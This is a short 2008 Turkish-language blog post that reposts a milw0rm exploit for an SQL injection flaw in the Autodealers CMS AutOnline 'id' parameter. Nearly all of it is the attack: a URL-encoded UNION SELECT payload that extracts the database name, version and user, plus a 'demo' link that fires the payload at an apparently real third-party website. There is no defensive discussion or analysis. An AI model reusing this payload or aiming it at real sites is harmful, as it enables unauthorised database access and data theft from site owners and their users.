"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

11 Eylül 2008 Perşembe

Autodealers CMS AutOnline (id) SQL Injection Vulnerability

Autodealers CMS AutOnline (id) SQL Injection Vulnerability

orjinal link:

http://www.milw0rm.com/exploits/6433


exploit:

http://localhost/script_path/index.php?page=detail&id=[SQL]


[SQL]=

ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*

demo:

http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*

0 yorum:

 
Dizi